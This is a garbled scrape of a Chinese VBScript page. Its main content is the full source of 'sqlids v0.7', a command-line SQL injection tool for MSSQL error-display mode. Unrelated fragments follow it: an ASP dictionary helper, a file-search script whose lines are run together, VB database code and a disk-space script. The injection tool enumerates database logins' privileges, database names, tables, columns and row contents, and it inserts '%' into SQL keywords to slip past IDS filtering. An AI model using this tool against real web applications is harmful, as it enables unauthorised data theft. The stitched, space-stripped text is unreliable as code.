逃跑吧少年钻石脚本ae导入

' (page text preceding the listing) Variant is the only data type in VBScript, so it is
' also the data type of every VBScript function's return value.
'
' Listing: "sqlids v0.7 for mssql2000 with error by lcx" (name taken from the banner below).
' A cscript command-line client that sends crafted conditions to a web parameter and reads
' database metadata and rows back out of the error text in the HTTP response.
'
' NOTE(review), points a defender can take from the code as printed:
'   * Every probe goes out as a POST with a fixed MSIE 7.0 User-Agent (see GetBody); the
'     query string of the supplied URL is moved into the POST body.
'   * result() only works when the response body echoes a database error containing the
'     word "varchar" followed by a single-quoted value - presumably SQL Server's
'     conversion-error message. Generic error pages remove that channel; parameterised
'     queries remove the underlying flaw.
'   * ReplaceKeyWord() inserts "%" inside SQL keywords. Presumably this depends on the
'     target's request decoder discarding a stray "%"; signature matching therefore has
'     to run on the value as the application sees it, not on the raw bytes.
'   * The "limit" mode asks about sysadmin / db_owner membership, so the privileges of
'     the application's database login bound what the remaining modes can read.
'   * Several literals are visibly damaged on this page (stray spaces inside the keyword
'     table, spaces missing from the "search" statement, "Ex" capitalised inside
'     identifiers). They are reproduced unchanged.

set arg=wscript.arguments

' Host check. As printed, a lower-cased value is compared with a literal that contains
' capitals, so the comparison can never be true; the intent appears to be to quit when
' started under wscript.exe instead of cscript.exe - TODO confirm against the original.
If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then
    Wscript.Quit
End If

' No arguments: print the usage text and stop.
if arg.count=0 then
    usage()
    Wscript.Quit
End If

' Prints the banner and one usage line per mode (limit, dbname, table, filed, result, search).
' The first echoed line states that only the MSSQL error-display mode is supported.
Sub usage()
    wsh.echo string(79,"*")
    wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
    wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
    wsh.echo "以下两个脚本可互相参考"
    wsh.echo ""
    wsh.echo ""
    wsh.echo "Usage:"
    wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs limit"
    wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs dbname"
    wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs table master"
    wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs id=1 filed master spt_server_info"
    wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs id=1 result id master sysinfo"
    wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs search pass"
    wsh.echo string(79,"*")&vbcrlf
end Sub

' Fetches Path through GetBody and decodes the raw response bytes as GB2312 text.
Function getHTTPPage(Path)
    t=GetBody(Path)
    getHTTPPage=BytesToBstr(t, "GB2312")
End Function

' Despite the name, only spaces are encoded (as %20); every other character is sent as is.
Function UrlEncode(str)
    str=Replace(str," ","%20")
    UrlEncode=str
End Function

' Gets the page source over XMLHTTP; the author notes it could be changed to a cookie or
' GET submission. Returns the raw response body.
' On Error Resume Next hides any failure here (for example a URL without "?" makes
' Aurl(1) invalid), in which case the function returns Empty.
Function GetBody(url)
    On Error Resume Next
    Aurl=Split(url,"?") ' split so the query string can be sent as the POST body
    Set Retrieval=CreateObject("Microsoft.XMLHTTP")
    With Retrieval
        .Open "post", Aurl(0), False, "", ""
        .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
        .setRequestHeader "Accept-Encoding", "gzip, deflate"
        ' Fixed User-Agent on every request; usable as a log-search term.
        .setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
        .setRequestHeader "Connection", "Keep-Alive"
        .setRequestHeader "Cache-Control", "no-cache"
        .Send UrlEncode(Aurl(1)) ' POST submit
        GetBody=.ResponseBody
        .abort
    End With
    Set Retrieval=Nothing
End Function

' Converts a byte array to a string in character set Cset using an ADODB.Stream:
' written in binary mode (Type=1), rewound, then read back as text (Type=2).
Function BytesToBstr(Body, Cset)
    Dim objstream
    Set objstream=CreateObject("adodb.stream")
    objstream.Type=1
    objstream.Mode=3
    objstream.Open
    objstream.Write Body
    objstream.Position=0
    objstream.Type=2
    objstream.Charset=Cset
    BytesToBstr=objstream.ReadTExt
    objstream.Close
    Set objstream=Nothing
End Function

' Author's comment: "bypass IDS filtering".
' Applies a table of "keyword->replacement" pairs (separated by "|[k]|") to Value; each
' replacement is the same keyword with a "%" inserted. Replace() is called without a
' compare argument, so matching is case-sensitive.
' NOTE(review): entries whose separators are damaged on this page ("shutdown- >...",
' "c%har| [k]", "|[k] |sp_") no longer split into two parts cleanly; the UBound check
' below skips any piece that does not split into exactly two.
Function ReplaceKeyWord(Value)
    Table="select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in% ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown- >shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har| [k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k] |sp_->s%p_|[k]|and->a%nd"
    Dim i, Relpacement, Temp
    Relpacement=Split(Table, "|[k]|")
    ReplaceKeyWord=Value
    For i=0 to UBound(Relpacement)
        Temp=Split(Relpacement(i), "->")
        If UBound(Temp)=1 Then ReplaceKeyWord=Replace(ReplaceKeyWord, Temp(0), Temp(1))
    NExt
End Function

' Author's comment: splits the page on the keyword "varchar"; a regular expression would
' be nicer. Returns the text between the first pair of single quotes that follows the
' first "varchar" in the page, or the page unchanged when "varchar" does not occur.
Function result(sHTMLTEMP)
    aHTML=Split(sHTMLTEMP, "varchar")
    If(UBound(aHTML) > 0)Then
        sHTMLTEMP=aHTML(1)
        aHTML=Split(sHTMLTEMP, "'")
        sHTMLTEMP=aHTML(1)
    End If
    result=sHTMLTEMP
End Function

' Author's comment: hex conversion for SQL. Emits "0x" followed by each character code
' in hex plus "00", i.e. a two-byte-per-character literal, so the value needs no quotes.
' Hex() is not zero-padded, so codes below 0x10 yield a single digit.
Function Str2HEx(strHEx)
    Dim sHEx
    For i=1 To Len(strHEx)
        sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00"
    NExt
    Str2HEx="0x"&sHEx
End Function

' Same as Str2HEx but without the "00" after each character (one byte per character).
Function Str2HExtwo(strHEx)
    Dim sHEx
    For i=1 To Len(strHEx)
        sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1)))
    NExt
    Str2HExtwo="0x"&sHEx
End Function

' Author's comment: remove duplicates. Rebuilds a comma-separated list, skipping an item
' when InStr finds it anywhere in the text built so far (a substring test, so an item
' contained in an earlier, longer item is dropped as well).
Function MoveR(Rstr)
    Dim i,SpStr
    SpStr=Split(Rstr,",")
    For i=0 To Ubound(Spstr)
        If I=0 then
            MoveR=MoveR & SpStr(i) & ","
        Else
            If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then
                MoveR=MoveR & SpStr(i)
            Elseif instr(MoveR,SpStr(i))=0 Then
                MoveR=MoveR & SpStr(i) & ","
            End If
        End If
    NExt
End Function

' Appends the keyword-rewritten statement to the script-level url, fetches the page and
' strips double quotes (Chr(34)) from the response text.
function page(sql)
    page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"")
End Function

url=arg(0)
injection=arg(1)

' Author's comment: the code below holds the injected statements and needs no quotes
' at all (string values are passed as 0x... literals instead).
select case arg(1)
Case "limit"
    ' Baseline response for the unmodified URL; the role checks compare lengths with it.
    body=Replace(getHTTPPage(url),Chr(34),"")
    ' Author's comment: statements kept separate for later editing; the first is sa, the
    ' second DB_owner. The hex literals decode to "sysadmin" and "db_owner" (two bytes
    ' per character).
    sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--"
    sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--"
    Bodyone=page(sqlone)
    bodytwo=page(sqltwo)
    wsh.echo "当前信息:"
    ' A probe whose response has the same length as the baseline is treated as true.
    ' As laid out here the first If is a single-line statement, so a sysadmin match
    ' prints "SA" and then also falls into the Else branch of the next If.
    If Len(body)=Len(Bodyone) Then wsh.echo "SA"
    If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then
        wsh.echo "DB_owner"
    Else
        wsh.echo "PUBLIC"
    End If
    ' Each condition compares a string-valued expression with 0; the value is then read
    ' back out of the resulting error text by result().
    sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
    rtemp=Split(sqlthtree,"|")
    servername=result(page(rtemp(0)))
    version=result(page(rtemp(1)))
    user=result(page(rtemp(2)))
    db_name=result(page(rtemp(3)))
    wsh.echo "servername:"&servername
    wsh.echo "version:"&version
    wsh.echo "user:"& user
    wsh.echo "db_name:"& db_name
case "dbname"
    ' Walks db_name(1), db_name(2), ... until a response no longer contains "varchar".
    i=1
    Do
        sql="and db_name("&i&")>0--" ' statement that discloses a database name
        Body=page(sql)
        k=InstrRev(body,"varchar", -1, 0)
        i=i+1
        If k<>0 Then
            wscript.echo result(body)
        Else
            wsh.echo "========over============"
        End if
    Loop Until k=0
case "table"
    i=1
    Do ' table-name statement; arg(2) is the database
        ' xtype=0x7500 is the two-byte literal for "u"; arg(2) is concatenated unchanged.
        sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects where xtype=0x7500))--"
        Body=page(sql)
        k=InstrRev(body,"varchar", -1, 0)
        i=i+1
        If k<>0 Then
            wscript.echo result(body)
        Else
            wsh.echo "========over============"
        End if
    Loop Until k=0
case "filed"
    ' Statements in this branch are written with "%" already inside the keywords.
    ' Step 1: object id of table arg(3) in database arg(2), marked with Chr(124) "|".
    sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0-- "
    biaoid=result(page(sqlbiaoid))
    biaoid=Replace(biaoid,Chr(124),"")
    ' Step 2: number of columns for that id, marked with Chr(94) "^".
    sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
    k=Replace(result(page(sqlclounmcnt)),Chr(94),"")
    wsh.echo "共有列名"&k&"个"
    ' Step 3: one request per column, ordered by colid.
    For i=1 To k
        sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&" order by colid) t order by colid desc)=0--"
        wsh.echo result(page(sqlfiled))
    nExt
case "result"
    i=1
    ' arg(2) = column, arg(3) = database, arg(4) = table (per the usage text).
    sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" ' statement that discloses the total row count
    k=result(page(sqlcloum))
    k=Replace(k,Chr(94),"")
    wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
    ' One request per row: k+1 requests in total against the same parameter.
    For i=1 To k
        sqlneirong="an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4) &"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
        Body=page(sqlneirong)
        wscript.echo Replace(result(body),Chr(94),"")
    Next
Case "search"
    love=Str2HExtwo(arg(2))
    wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
    TimeSpend=Timer
    For i=1 To 10 ' the 10 can be changed as needed
        ' NOTE(review): as printed on this page the statement has lost the spaces
        ' between its words; it is reproduced unchanged.
        sqlsearch="And (selecttop1t_name%2bchar(124)%2bc_namefrom(selecttop"&i&"object_name(id)ast_name,nameasc_namefromsyscolumnswherecharindEx(cast("&love&"asvarchar(2000)),name)%3E0andleft(name,1)!=0x40orderbyt_nameasc)asTorderbyt_namedesc)>0--"
        Body=page(sqlsearch)
        body=result(body)
        a=a&body&","
    NExt
    TimeSpend=round(Timer - TimeSpend,2)
    wsh.echo MoveR(a)
    wsh.echo "用时:" & TimeSpend & "秒."
Case Else
    ' The Or-chain is true for every value of arg(1) (no value equals all five names at
    ' once), so this branch always prints the warning and the usage text.
    If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then
        wscript.echo "注意参数"
        usage()
    End if
end select

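' (page text preceding the listing) A shell script that implements ls
''
' ASP/VBScript Dictionary extract
' Author: WangYe
' For more information please visit
'
' This code is distributed under the BSD license
''
' Copies every key/value pair of a collection into read-only properties of a new
' DynamicObject and returns the object produced by its GetObject() method.
'
' collection  A collection or dictionary that can be walked with For Each,
'             e.g. Request.Form or Request.QueryString.
' specified   Comma-separated names of properties that must exist; any that the
'             collection does not supply is created with an empty string value.
' prefix      Text put in front of every property name.
' callback    Name of a function called for the value of every element (key-value).
'             Prototype:
'                 Function filter(key, value)
'                     filter=value
'                 End Function
'             The value returned by that function is the one stored.
'
' NOTE(review): when the collection is Request.Form or Request.QueryString the keys are
' chosen by the client, so the property names on the returned object are client-chosen
' too. Pass a non-empty prefix and read only the names the page expects. The callback
' argument is resolved with GetRef, so it should be a fixed procedure name written in
' the calling code, never a value taken from the request.
Function extract(collection, ByVal specified, prefix, callback)
    Dim VarName, VarValue, DynObj, searchKey
    ' Normalise to ",a,b,c," so that every name can be matched as ",name,".
    specified="," & Replace(specified, " ", "") & ","
    Set DynObj=New DynamicObject
    For Each key In collection
        searchKey="," & key & ","
        ' Remove names the collection already supplies. The match is replaced by a single
        ' "," (not by ""), so the names on either side stay separated, and the replace
        ' uses the same text comparison as the InStr test. The loop also clears a name
        ' that is listed more than once.
        Do While InStr(1, specified, searchKey, 1)>0
            specified=Replace(specified, searchKey, ",", 1, -1, 1)
        Loop
        VarName=prefix & key
        VarValue=collection(key)
        If callback<>"" Then
            VarValue=GetRef(callback)(key, VarValue)
        End If
        DynObj.add VarName, VarValue, PROPERTY_ACCESS_READONLY
    Next
    ' Whatever is left in the list was not supplied: create it with an empty value.
    specified_array=Split(specified, ",")
    Dim i
    For i=LBound(specified_array) To UBound(specified_array)
        If specified_array(i)<>"" Then
            DynObj.add prefix & specified_array(i), "", PROPERTY_ACCESS_READONLY
        End If
    Next
    Set extract=DynObj.GetObject()
End Function
' (page text following the listing) 3. The ActiveMovie control can also be opened like
' this: Shell"RUNDLL32.EXEamovie.ocx,Rundll",1 while
' Shell"RUNDLL32.EXEamovie.ocx,Rundll/playX",1 plays the media file directly.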

onerrorresumenext DimkeyWord,DirTotal,TimeSpend,FileTotal,Fso,outFile,txtResult,txtPath,sPath ConstMY_COMPUTER=&H11& ConstWINDOW_HANDLE=0 ConstOPTIONS=0 SetobjShell=CreateObject("Shell.Application") SetobjFolder=objShell.Namespace(My_Computer) SetobjFolderItem=objFolder.Self strPath=objFolderItem.Path SetobjFolder=objShell.BrowseForFolder(WINDOW_HANDLE,"选择你要搜索的文件夹:",OPTIONS,strPath) IfobjFolderIsNothingThen msgbox"您没有选择任何有效目录!" wscript.quit else SetobjFolderItem=objFolder.Self sPath=objFolderItem.Path txtpath=sPath SetFso=wscript.CreateObject("scripting.filesystemobject") FileTotal=0 DirTotal=0 'sPath=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName)) 'txtPath=trim(inputbox("你选的目录是"&sPath,"文件搜索",sPath)) keyWord=LCase(inputbox("请输入搜索关键字点Cancel的话会得到目录列表:","文件搜索","mp3")) setoutFile=Fso.createtextfile(sPath&"\SearchResult.txt") outFile.writeline"开始搜索..." outFile.writeline"起启目录:"&txtPath TimeSpend=Timer myFindtxtPath TimeSpend=round(Timer-TimeSpend,2) txtResult="搜索完成!"&vbCrLf&"共找到文件:"&FileTotal&"个."&vbCrLf&"共搜索目录:"&DirTotal&"个."&vbCrLf&"用时:"&TimeSpend&"秒." 
outFile.writetxtResult msgboxtxtResult&"结果保存在"&sPath&"\SearchResult.txt" outFile.close setoutFile=nothing setFso=nothing SubmyFind(ByValthePath) Dimfso,myFolder,myFile,curFolder Setfso=wscript.CreateObject("scripting.filesystemobject") SetcurFolders=fso.getfolder(thePath) DirTotal=DirTotal+1 IfcurFolders.Files.Count>0Then ForEachmyFileIncurFolders.Files IfInStr(1,LCase(myFile.Name),keyWord)>0Then outFile.WriteLineFormatPath(thePath)&""&myFile.Name FileTotal=FileTotal+1 EndIf Next EndIf IfcurFolders.subfolders.Count>0Then ForEachmyFolderIncurFolders.subfolders myFindFormatPath(thePath)&""&myFolder.Name Next EndIf EndSub FunctionFormatPath(ByValthePath) thePath=Trim(thePath) FormatPath=thePath IfRight(thePath,1)=""ThenFormatPath=Mid(thePath,1,Len(thePath)-1) EndFunction EndifPrivateSubCommand1_Click()OnErrorGoToErr100'定义表与字段DimDefDatabaseAsDatabaseDimDefTableAsTableDef,DefFieldAsFieldSetDefDatabase=Workspaces(0).OpenDatabase(App.Path&"\vbeden.mdb",0,False)SetDefTable=DefDatabase.CreateTableDef("VB编程乐园")'dbBinary=9'dbBoolean=1'dbByte=2'dbChar=18'dbDate=8'dbInteger=3'dbLong=4'dbMemo=12'dbText=10'建立Name字段为8个字符型SetDefField=DefTable.CreateField("Name",dbText,8)DefTable.Fields.AppendDefFieldSetDefField=DefTable.CreateField("Sex",dbText,2)DefTable.Fields.AppendDefField'该字段允许为空DefField.AllowZeroLength=True'建立Age字段为3个的常整型SetDefField=DefTable.CreateField("Age",dbInteger,3)'字段追加DefTable.Fields.AppendDefField'表追加DefDatabase.TableDefs.AppendDefTableMsgBox"VB编程乐园数据库建立完成

Connecting to server …Done. 遵循这个原则,就可以在循环中每反复N次才执行一次DoEvents语句,从而提高效率。

'说明 : 通过VBS脚本查看 系统C盘 剩下的空间 'Creator : Eric1991 'Date : 2013-11-4 Set objWMIService=GetObject("winmgmts:") Set objLogicalDisk=objWMIService.Get("Win32_LogicalDisk.DeviceID='c:'") Wscript.Echo cint(objLogicalDisk.FreeSpace / 1024 / 1024 / 1024) & "GB" 如何录制md_click事件引发timer3_time过程,通过逻辑变量1(2)控制文字变化的方式,1(2)=true时使文字渐现,1(2)=false时使文字渐隐那么,如果最后四个字符是.scr会怎样?在这种情况下,我们只关心两种可能:屏幕保护程序启动或屏幕保护程序结束。
